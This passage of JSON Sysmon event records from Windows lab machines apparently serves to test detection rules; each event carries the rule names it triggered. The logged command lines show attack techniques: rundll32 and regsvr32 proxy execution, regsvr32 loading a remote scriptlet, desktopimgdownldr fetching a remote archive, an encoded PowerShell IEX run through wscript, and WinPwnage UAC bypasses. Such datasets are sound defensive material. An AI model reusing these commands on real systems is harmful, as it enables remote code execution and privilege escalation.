(win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-1596-5CD8-0000-0020103A0100","LogonId":"0x13a10","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-2006-5CD8-0000-0010E0912300","ParentProcessId":2936,"ProcessGuid":"365ABB72-20B1-5CD8-0000-001064D62400","ProcessId":1844,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 
13:33:37.063"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16391,"Execution_attributes":{"ProcessID":2032,"ThreadID":1996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T13:33:37.078801Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-1596-5CD8-0000-0020103A0100","LogonId":"0x13a10","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-2006-5CD8-0000-0010E0912300","ParentProcessId":2936,"ProcessGuid":"365ABB72-20C7-5CD8-0000-001021022500","ProcessId":1416,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 
13:33:59.727"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16392,"Execution_attributes":{"ProcessID":2032,"ThreadID":1996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T13:33:59.743077Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-1596-5CD8-0000-0020103A0100","LogonId":"0x13a10","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-2006-5CD8-0000-0010E0912300","ParentProcessId":2936,"ProcessGuid":"365ABB72-21B8-5CD8-0000-0010BADE2600","ProcessId":3856,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 
13:38:00.523"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16395,"Execution_attributes":{"ProcessID":2032,"ThreadID":1996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T13:38:00.523670Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Code Execution via Pcwutl.dll","Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\" pcwutl.dll,LaunchApplication c:\\Windows\\system32\\calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-4FB5-5CD8-0000-0020F2350100","LogonId":"0x135f2","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-516B-5CD8-0000-001087E41600","ParentProcessId":3788,"ProcessGuid":"365ABB72-532E-5CD8-0000-00106C222700","ProcessId":1528,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 
17:09:02.275"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16507,"Execution_attributes":{"ProcessID":2012,"ThreadID":300},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T17:09:02.275164Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["FromBase64String Command Line","Encoded FromBase64String","Suspicious Script Execution From Temp Folder","Encoded IEX"],"event":{"Event":{"EventData":{"CommandLine":"\"c:\\windows\\system32\\wscript.exe\" /E:vbs c:\\windows\\temp\\icon.ico \"powershell -exec bypass -c \"\"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')))\"\"\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft ® Windows Based Script Host","FileVersion":"5.812.10240.16384","Hashes":"SHA1=267D05CE8D10D97620BE1C7773757668BAEB19EE,MD5=F5E5DF6C9D62F4E940B334954A2046FC,SHA256=47CACD60D91441137D055184614B1A418C0457992977857A76CA05C75BBC1B56,IMPHASH=0F71D5F6F4CBB935CE1B09754102419C","Image":"C:\\Windows\\System32\\wscript.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-F419-5D53-0000-002026910200","LogonId":"0x29126","ParentCommandLine":"C:\\Windows\\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding","ParentImage":"C:\\Windows\\explorer.exe","ParentProcessGuid":"747F3D96-F639-5D53-0000-001092EE2600","ParentProcessId":6000,"ProcessGuid":"747F3D96-F639-5D53-0000-0010B0FC2600","ProcessId":8180,"Product":"Microsoft ® Windows Script Host","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-14 
11:53:29.768"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":10662,"Execution_attributes":{"ProcessID":2004,"ThreadID":4480},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-08-14T11:53:30.022856Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Desktopimgdownldr Command"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.592 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-1CE4-5EFE-0000-0020CC9C0800","LogonId":"0x89ccc","OriginalFileName":"Cmd.Exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-EF3D-5EFE-0000-0010F3653401","ParentProcessId":5384,"ProcessGuid":"747F3D96-F098-5EFE-0000-001012E13801","ProcessId":1932,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-07-03 
08:47:20.001"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":305352,"Execution_attributes":{"ProcessID":3324,"ThreadID":4016},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-07-03T08:47:20.037922Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Desktopimgdownldr Command"],"event":{"Event":{"EventData":{"CommandLine":"desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"desktopimgdownldr.exe","FileVersion":"10.0.17763.1075 (WinBuild.160101.0800)","Hashes":"SHA1=BCDDCFFCA3754875261EF1427EC4F5F4BFB8C2CE,MD5=A6DAD18B0AA125535C7FB9BBFDA25266,SHA256=0A6A2690C68CF685D8FCC9F3EA78C35BBF6F296B7B33C956B39400DF749DBC78,IMPHASH=F8D617766CF1026390A712DFC1AE2EDA","Image":"C:\\Windows\\System32\\desktopimgdownldr.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-1CE4-5EFE-0000-0020CC9C0800","LogonId":"0x89ccc","OriginalFileName":"desktopimgdownldr.exe","ParentCommandLine":"cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-F098-5EFE-0000-001012E13801","ParentProcessId":1932,"ProcessGuid":"747F3D96-F098-5EFE-0000-001090E33801","ProcessId":4604,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-07-03 
08:47:20.055"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":305354,"Execution_attributes":{"ProcessID":3324,"ThreadID":4016},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-07-03T08:47:20.073262Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Desktopimgdownldr Target File","UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-07-03 08:47:21.485","Image":"C:\\Windows\\System32\\svchost.exe","ProcessGuid":"747F3D96-2178-5EFE-0000-0010AADA5800","ProcessId":1556,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\Personalization\\LockScreenImage\\LockScreenImage_uXQ8IiHL80mkJsKc319JaA.7z","UtcTime":"2020-07-03 08:47:21.485"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":305356,"Execution_attributes":{"ProcessID":3324,"ThreadID":4016},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-07-03T08:47:21.491108Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Always Install Elevated MSI Spawned Cmd And Powershell"],"event":{"Event":{"EventData":{"CommandLine":"cmd","Company":"Microsoft 
Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-C494-5CC8-0000-0020E4FF0000","LogonId":"0xffe4","ParentCommandLine":"\"C:\\Windows\\Installer\\MSI4FFD.tmp\"","ParentImage":"C:\\Windows\\Installer\\MSI4FFD.tmp","ParentProcessGuid":"365ABB72-D0E4-5CC8-0000-00103CB73E00","ParentProcessId":3680,"ProcessGuid":"365ABB72-D0E5-5CC8-0000-0010DADF3E00","ProcessId":2892,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 22:49:09.276"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":10153,"Execution_attributes":{"ProcessID":1936,"ThreadID":1644},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T22:49:10.198351Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-C494-5CC8-0000-0020E4FF0000","LogonId":"0xffe4","ParentCommandLine":"cmd","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-D0E5-5CC8-0000-0010DADF3E00","ParentProcessId":2892,"ProcessGuid":"365ABB72-D1AB-5CC8-0000-0010DB1E4400","ProcessId":1372,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 22:52:27.588"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":10154,"Execution_attributes":{"ProcessID":1936,"ThreadID":1644},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T22:52:27.588976Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Flags Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"CommandLine":"/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft(C) Register Server","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-433D-5CE0-0000-002031350100","LogonId":"0x13531","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k netsvcs","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentProcessGuid":"365ABB72-433C-5CE0-0000-00100FD20000","ParentProcessId":964,"ProcessGuid":"365ABB72-4612-5CE0-0000-00103D1E2600","ProcessId":2600,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-18 17:51:14.254"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":18851,"Execution_attributes":{"ProcessID":2044,"ThreadID":1636},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-18T17:51:14.254967Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\" advpack.dll,RegisterOCX c:\\Windows\\System32\\calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-2523-5CD8-0000-00204C360100","LogonId":"0x1364c","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-2B1B-5CD8-0000-0010CCC92500","ParentProcessId":3320,"ProcessGuid":"365ABB72-2B21-5CD8-0000-001039DD2500","ProcessId":816,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 14:18:09.573"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16452,"Execution_attributes":{"ProcessID":2036,"ThreadID":296},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T14:18:09.589507Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-12 13:56:12.329","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-25EC-5CD8-0000-0010CB0A1000","ProcessId":684,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\shdocvw.url","UtcTime":"2019-05-12 
13:56:12.329"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":16437,"Execution_attributes":{"ProcessID":2036,"ThreadID":296},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-12T13:56:12.329626Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\" shdocvw.dll,OpenURL c:\\users\\ieuser\\appdata\\local\\temp\\shdocvw.url","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-2523-5CD8-0000-00204C360100","LogonId":"0x1364c","ParentCommandLine":"python winpwnage.py -u execute -i 12 -p c:\\Windows\\System32\\calc.exe","ParentImage":"C:\\Python27\\python.exe","ParentProcessGuid":"365ABB72-25EC-5CD8-0000-0010CB0A1000","ParentProcessId":684,"ProcessGuid":"365ABB72-25FC-5CD8-0000-0010906A1300","ProcessId":2168,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 
13:56:12.485"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16438,"Execution_attributes":{"ProcessID":2036,"ThreadID":296},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T13:56:12.652868Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["XSL Script Processing"],"event":{"Event":{"EventData":{"CommandLine":"msxsl.exe c:\\Users\\IEUser\\AppData\\Roaming\\Adobe\\test.dat c:\\Users\\IEUser\\AppData\\Roaming\\Adobe\\test.dat","Company":"Microsoft","CurrentDirectory":"D:\\","Description":"msxsl","FileVersion":"1.1.0.1","Hashes":"SHA1=8B516E7BE14172E49085C4234C9A53C6EB490A45,MD5=3E9F31B4E2CD423C015D34D63047685E,SHA256=35BA7624F586086F32A01459FCC0AB755B01B49D571618AF456AA49E593734C7,IMPHASH=2477F6A819520981112AD254E2BD87D8","Image":"\\\\vboxsrv\\HTools\\msxsl.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-CE6C-5CE6-0000-002047F30000","LogonId":"0xf347","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-D2D4-5CE6-0000-001047EA6400","ParentProcessId":2236,"ProcessGuid":"365ABB72-D7B0-5CE6-0000-001077C56D00","ProcessId":3388,"Product":"Command Line XSLT","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-23 
17:26:08.686"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":1017,"Execution_attributes":{"ProcessID":2032,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-23T17:26:08.716859Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["XSL Script Processing"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"MSXML 3.0 SP11","FileVersion":"8.110.7601.23648","Hashes":"SHA1=723644A78C703DF177235E820A906B9621B9B2FB,MD5=3CB096F266A52F65A571B2A3FC81D13E,SHA256=12D498F5310AD70818C7251B5D6AAF145CD7FA67887125645E245D856347BFAA,IMPHASH=EF7BEA73AB4F834F0C44DDE0150B5648","Image":"\\\\vboxsrv\\HTools\\msxsl.exe","ImageLoaded":"C:\\Windows\\System32\\msxml3.dll","ProcessGuid":"365ABB72-D7B0-5CE6-0000-001077C56D00","ProcessId":3388,"Product":"Microsoft(R) MSXML 3.0 SP11","RuleName":"Execution - Suspicious Microsoft.XMLDOM module load","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-05-23 17:26:08.927"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":7,"EventRecordID":1018,"Execution_attributes":{"ProcessID":2032,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-05-23T17:26:08.947190Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious 
ftp.exe"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\cmd.exe /C c:\\Windows\\system32\\calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-4FB5-5CD8-0000-0020F2350100","LogonId":"0x135f2","ParentCommandLine":"\"C:\\Windows\\System32\\ftp.exe\" 